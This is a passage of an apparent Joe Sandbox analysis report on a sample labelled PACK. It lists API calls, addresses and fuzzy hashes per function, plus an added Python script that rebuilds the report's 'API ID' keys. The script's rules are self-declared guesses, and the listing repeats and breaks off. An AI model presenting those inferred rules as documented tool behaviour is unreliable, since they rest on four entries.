                                                                                                                                                                            • Opcode Fuzzy Hash: d4fe9e8022c00edde94af4c3e662030b2db9b639d4a981c0fa904745366f68ba
                                                                                                                                                                            • Instruction Fuzzy Hash: 26110A33E0512A5B9F36DE69DC40A7A73A5AF843307174120FE54AB2A8D7B9DC41E7E0
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00010000,Function_0001062F,?,00000000,00000000), ref: 00FE0519
                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00FE0560
                                                                                                                                                                              • Part of subcall function 00FD6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD6CEC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                            • String ID: CreateThread failed
                                                                                                                                                                            • API String ID: 2655393344-3849766595
                                                                                                                                                                            • Opcode ID: 250823155a18fbbb702b7a5bd9f4f19822fcc9849b32cca59b656f494dab6138
                                                                                                                                                                            • Instruction ID: a179138d1a0aba22f559f8f676c7e9bad99142752882d360f3d4687fb724496d
                                                                                                                                                                            • Opcode Fuzzy Hash: 250823155a18fbbb702b7a5bd9f4f19822fcc9849b32cca59b656f494dab6138
                                                                                                                                                                            • Instruction Fuzzy Hash: 31017DB13443016FD230AF52EC45F6B3399EB40751F24042EF6C2A6289CEE568C0DB30
                                                                                                                                                                            APIs
                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00FF9CD5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: String
• String ID: 6P+$LCMapStringEx
• API String ID: 2568140703-157081382
• Opcode ID: 9cb318d1115fbdd6c8200cf43eb451c79f5ac3ab37c852f9b0742063cf54b51e
• Instruction ID: 421ae8469cbec8a855039b347179a0d4435f780e74e5b46bb440ba4490a997d1
• Opcode Fuzzy Hash: 9cb318d1115fbdd6c8200cf43eb451c79f5ac3ab37c852f9b0742063cf54b51e
• Instruction Fuzzy Hash: D201D33254420DBBDF22AF91DD05EAE3FA6FF08760F014518FE5426160CA778931EB90

APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FF9291), ref: 00FF9C4D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: 6P+$InitializeCriticalSectionEx
• API String ID: 2593887523-3301944762
• Opcode ID: 4fdf3018fdb7b737f5ea7e1f8f9a63a33c67681ce141a5b4e487d8e4134ee37a
• Instruction ID: f23bd8e7a0d217dfa770a63fc06e3a4108243640f8db0251ad482d1c3d3dc668
• Opcode Fuzzy Hash: 4fdf3018fdb7b737f5ea7e1f8f9a63a33c67681ce141a5b4e487d8e4134ee37a
• Instruction Fuzzy Hash: 92F0B431A4520CFBCB22AF92DC05DAE7FA1EF08720F014018FE445B160CAB68A20EB90

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Alloc
• String ID: 6P+$FlsAlloc
• API String ID: 2773662609-438482471
• Opcode ID: 2eab4652583afea0af47f3e0de72334fcf33988fc59e35716e53318b7b497a03
• Instruction ID: 5fb34ac863904787debe2835d5ccc72481112ebe5e0e98afad5926ba5e49d1a2
• Opcode Fuzzy Hash: 2eab4652583afea0af47f3e0de72334fcf33988fc59e35716e53318b7b497a03
• Instruction Fuzzy Hash: 36E0A731E4521C679632BB929C05A6F7B65DF04710F014059FE4557240CDAA5D1097D5

APIs
• GetStdHandle.KERNEL32(000000F5,?,?,00FDC90A,00000001,?,?,?,00000000,00FE4AF4,?,?,?,?,?,00FE4599), ref: 00FD9C4F
• WriteFile.KERNEL32(?,00000000,?,00FE47A1,00000000,?,?,00000000,00FE4AF4,?,?,?,?,?,00FE4599,?), ref: 00FD9C8F
• WriteFile.KERNEL32(?,00000000,?,00FE47A1,00000000,?,00000001,?,?,00FDC90A,00000001,?,?,?,00000000,00FE4AF4), ref: 00FD9CBC
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: 4d70e66ffc7fb40e19249583a00037fa9d07b548960d7e01ad6af23c7309d4a1
• Instruction ID: 3dc8fbf58365e075606fe800fbaab6348781f35be6c78bbef024466f25739b8e
• Opcode Fuzzy Hash: 4d70e66ffc7fb40e19249583a00037fa9d07b548960d7e01ad6af23c7309d4a1
• Instruction Fuzzy Hash: C0313A71618306AFD7219F50C808BA6B7DBFB51311F08860AF195933C0C7B4A848DBA1

APIs
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FD9F19
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FD9F4C
• GetLastError.KERNEL32(?,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FD9F69
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: CreateDirectory$ErrorLast
• String ID:
• API String ID: 2485089472-0
• Opcode ID: ff6c4ba08f1e031e2018df043fae8cdb799b52dc2c61b5222ce3442ba68ea615
• Instruction ID: 0c7c1030c095bc21c22053cc94f0e1e4cde8e36b6d28006dead4d073d5092f69
• Opcode Fuzzy Hash: ff6c4ba08f1e031e2018df043fae8cdb799b52dc2c61b5222ce3442ba68ea615
• Instruction Fuzzy Hash: 5B01923190C254A5EB329BE58C49BFD334E9F05750F0C0443F541D5252D7D8C981F6A6

APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FEC8FC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FEC915
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FEC920
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ObjectSingleWait$MessagePeek
• String ID:
• API String ID: 1965964400-0
• Opcode ID: 817da017f381c5842302045737834fbf5addf426a9566e857843890516a6686c
• Instruction ID: c6d680df05fb595ec19406692208022d9a493cdc376ab6207fd03a93cb51c859
• Opcode Fuzzy Hash: 817da017f381c5842302045737834fbf5addf426a9566e857843890516a6686c
• Instruction Fuzzy Hash: 55E04F31B403087BEA216F90EC8EFA97B6AE718741F504022FB46A90C6D6A658919795

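The Similarity block of each entry carries an API ID key that, judging from the entries above, is built from the names of the APIs the function calls: two WriteFile calls plus one GetStdHandle become FileWrite$Handle, two WaitForSingleObject calls plus one PeekMessageW become ObjectSingleWait$MessagePeek. The Python below is an added example, not code from Joe Sandbox or from the analysed sample; it parses entries in this listing format and rebuilds that key so a practitioner can check it, and carry the call-site addresses and Instruction Fuzzy Hash over when matching this dump against another report. The CamelCase split, the stop-word list (Get, Std, For, And, one-letter charset suffixes) and the ordering of groups by call count are assumptions inferred from the four entries on this page whose API lists are visible; the sample input is transcribed from this page with its argument lists shortened.

```python
"""Parse Joe Sandbox per-function entries and rebuild their "API ID" keys.

Added example, not Joe Sandbox code. The tokenisation and stop-word rules are an
ASSUMPTION inferred from the four entries on this page whose API lists survived
extraction; a mismatch means "rule unknown", not "different function".
"""
import re
from collections import Counter

# Constructed input: two entries transcribed from this report, with the page
# indentation and "Download File" link residue removed and the long argument
# lists shortened. Only API names, call counts and ref addresses matter here.
SAMPLE_ENTRIES = """\
APIs
• GetStdHandle.KERNEL32(000000F5,?,?,00FDC90A,00000001), ref: 00FD9C4F
• WriteFile.KERNEL32(?,00000000,?,00FE47A1,00000000), ref: 00FD9C8F
• WriteFile.KERNEL32(?,00000000,?,00FE47A1,00000000), ref: 00FD9CBC
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Instruction Fuzzy Hash: C0313A71618306AFD7219F50C808BA6B7DBFB51311F08860AF195933C0C7B4A848DBA1
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FEC8FC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FEC915
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FEC920
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Similarity
• API ID: ObjectSingleWait$MessagePeek
• String ID:
• Instruction Fuzzy Hash: 55E04F31B403087BEA216F90EC8EFA97B6AE718741F504022FB46A90C6D6A658919795
"""

# One "• Name.MODULE(args), ref: ADDR" line. The "Part of subcall function"
# prefix and the argument list are optional (cf. "__EH_prolog.LIBCMT ref: ...").
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

# Assumed stop words: tokens the page's own IDs visibly drop
# (GetStdHandle -> Handle, WaitForSingleObject -> ObjectSingleWait,
#  InitializeCriticalSectionAndSpinCount -> CountCriticalInitializeSectionSpin).
STOP_TOKENS = {"Get", "Std", "For", "And"}


def parse_entries(text):
    """Split a listing into entries; each entry starts at an 'APIs' header."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "fields": {}}
            entries.append(current)
        elif current is not None and line:
            m = API_LINE.match(line)
            if m:
                current["apis"].append((m["api"], m["module"], m["ref"].upper()))
                continue
            m = FIELD_LINE.match(line)
            if m:
                current["fields"][m["key"].strip()] = m["value"].strip()
    return entries


def api_tokens(name):
    """CamelCase split, dropping stop words and one-letter A/W charset suffixes."""
    tokens = re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", name)
    return [t for t in tokens if t not in STOP_TOKENS and len(t) > 1]


def api_id(api_names):
    """One group per distinct API (its tokens sorted), groups ordered by call
    count (ties: first appearance, an assumption), joined with '$'."""
    counts = Counter(api_names)
    first_seen = {}
    for i, n in enumerate(api_names):
        first_seen.setdefault(n, i)
    ordered = sorted(counts, key=lambda n: (-counts[n], first_seen[n]))
    return "$".join("".join(sorted(api_tokens(n))) for n in ordered)


def check_entries(text):
    """Per entry: reported vs. derived API ID, plus the fields worth carrying
    over to another report (call-site refs, instruction fuzzy hash)."""
    results = []
    for e in parse_entries(text):
        names = [api for api, _module, _ref in e["apis"]]
        reported = e["fields"].get("API ID", "")
        derived = api_id(names) if names else ""
        results.append({
            "reported": reported,
            "derived": derived,
            "match": bool(names) and reported == derived,
            "refs": [ref for _api, _module, ref in e["apis"]],
            "fuzzy": e["fields"].get("Instruction Fuzzy Hash", ""),
        })
    return results


if __name__ == "__main__":
    for r in check_entries(SAMPLE_ENTRIES):
        print(f"{'OK ' if r['match'] else 'BAD'} reported={r['reported']!r} "
              f"derived={r['derived']!r} refs={r['refs']}")
```

Entries whose API lines did not survive extraction (the Alloc and String entries above) come out with an empty derived key and match False; that is a gap in the listing, not evidence of a different function. When the derived and reported keys disagree for an entry that does have API lines, the safer reading is that the inferred rule is incomplete, so fall back to the ref addresses and the Instruction Fuzzy Hash for cross-report matching.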
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID: CMT
• API String ID: 3519838083-2756464174
• Opcode ID: 2e5d8ef510c2c20c994a9ce8aa46d7cc513aa304510cc0b4cd7634e84ff7c3b5
• Instruction ID: 06c5368cd0bc2427689ddbb7f528370ec3f7249d5b7bd2d65c30a9a3dae6b181
• Opcode Fuzzy Hash: 2e5d8ef510c2c20c994a9ce8aa46d7cc513aa304510cc0b4cd7634e84ff7c3b5
• Instruction Fuzzy Hash: E571C276500B44AEDB21DB30CC41AEBB7EAAF14301F48495FE6DB87342D6356A48EF12

APIs
• __EH_prolog.LIBCMT ref: 00FD1D66
  • Part of subcall function 00FD399D: __EH_prolog.LIBCMT ref: 00FD39A2
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID: CMT
                                                                                                                                                                            • API String ID: 3519838083-2756464174
                                                                                                                                                                            • Opcode ID: ebb0ffb01c222930deb2644d31da2adea97b555273461bf5416e85782901d22d
                                                                                                                                                                            • Instruction ID: b3914feabf8a0fddc717b6da8f569e168c4b608421284ef488d6816db0564dd2
                                                                                                                                                                            • Opcode Fuzzy Hash: ebb0ffb01c222930deb2644d31da2adea97b555273461bf5416e85782901d22d
                                                                                                                                                                            • Instruction Fuzzy Hash: DD214B72904148AFCB15EF99DD51AEEFBF6FF48300F1800AAE845A7251C7365E50EBA0
APIs
  • Part of subcall function 00FE1432: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,?,00000000,?,00FDAB7B,?,?,00000000,?,?,?), ref: 00FE1484
  • Part of subcall function 00FE9A8D: SetCurrentDirectoryW.KERNEL32(?,00FE9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,010185FA,00000006), ref: 00FE9A91
• SHFileOperationW.SHELL32(?,?,?,?,?,010185FA,00000006), ref: 00FE9D36
Strings
• C:\Program Files\VS Revo Group\Revo Uninstaller Pro, xrefs: 00FE9CDA
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: CompareCurrentDirectoryFileOperationString
• String ID: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
• API String ID: 3543741193-2410753234
• Opcode ID: f31882dc081ce5e9c64cada86b39a56e2da7848e2ac60afa1a9fb8f03af12801
• Instruction ID: 74fcde6cd04bc2072d95d309a43ea8e20cf53b36d83152388b6db36c1aaa778e
• Opcode Fuzzy Hash: f31882dc081ce5e9c64cada86b39a56e2da7848e2ac60afa1a9fb8f03af12801
• Instruction Fuzzy Hash: 6F017571D4029965DB21ABE5DC0AEDF73BCEF08710F000466F645E3142E6FD9A449BA5
APIs
• try_get_function.LIBVCRUNTIME ref: 00FF282F
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
• Opcode ID: 0c828d6a5101e3fb2fe55a2d9507028a97e8ab6588037f98864c5d3f4d19ef4b
• Instruction ID: 1aed2fe31522218a830035554a3fca66d680d8839413a892e8b4451195769363
• Opcode Fuzzy Hash: 0c828d6a5101e3fb2fe55a2d9507028a97e8ab6588037f98864c5d3f4d19ef4b
• Instruction Fuzzy Hash: 3CD02B31B8132C63D51232C67C029AA7F088B00BB1F015063FF4CA9142D5D90C0062D5
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED7EC
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3Ro
• API String ID: 1269201914-1492261280
• Opcode ID: 19ca2d97b2de8b3d720338f3ac7775cd1f7b5c66ca378fb070aaa50009e0144d
• Instruction ID: 0d6aa7dca1377519d8dcf55480a6f3f1f853c2431d6abd7b7323a4a680796a0b
• Opcode Fuzzy Hash: 19ca2d97b2de8b3d720338f3ac7775cd1f7b5c66ca378fb070aaa50009e0144d
• Instruction Fuzzy Hash: 8CB01282368681FD30067283AE02C37020CD1D0B3C730840FF444C44C6D4459C412031
APIs
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _memcmp_strlen
• String ID:
• API String ID: 2682527083-0
• Opcode ID: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
• Instruction ID: 50fa6068321ec506bc96ae7e3d0c558088cc03326e7b63f601a156de1294eb63
• Opcode Fuzzy Hash: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
• Instruction Fuzzy Hash: F251D873504344ABDB20EA50DC89FDBB3EDAB89700F08093EF989D7252DA39E544D766
APIs
• __EH_prolog.LIBCMT ref: 00FD1382
  • Part of subcall function 00FD5E99: __EH_prolog.LIBCMT ref: 00FD5E9E
  • Part of subcall function 00FDC4CA: __EH_prolog.LIBCMT ref: 00FDC4CF
  • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC512
  • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC536
• new.LIBCMT ref: 00FD13FA
  • Part of subcall function 00FDAD1B: __EH_prolog.LIBCMT ref: 00FDAD20
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 44631df13c2e7893f4bec552b3f4b6bb4ffa2d3171462db5041f8034c3859b15
• Instruction ID: 5ecfc486bf7966052acd9abe04a4ff7438c4705c51421f47955c161d937718e9
• Opcode Fuzzy Hash: 44631df13c2e7893f4bec552b3f4b6bb4ffa2d3171462db5041f8034c3859b15
• Instruction Fuzzy Hash: ED4155B1805B409EE720DF798885AE6FBE6FF19300F544A2ED5EE83282CB366554CB11
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD1382
                                                                                                                                                                              • Part of subcall function 00FD5E99: __EH_prolog.LIBCMT ref: 00FD5E9E
                                                                                                                                                                              • Part of subcall function 00FDC4CA: __EH_prolog.LIBCMT ref: 00FDC4CF
                                                                                                                                                                              • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC512
                                                                                                                                                                              • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC536
                                                                                                                                                                            • new.LIBCMT ref: 00FD13FA
                                                                                                                                                                              • Part of subcall function 00FDAD1B: __EH_prolog.LIBCMT ref: 00FDAD20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
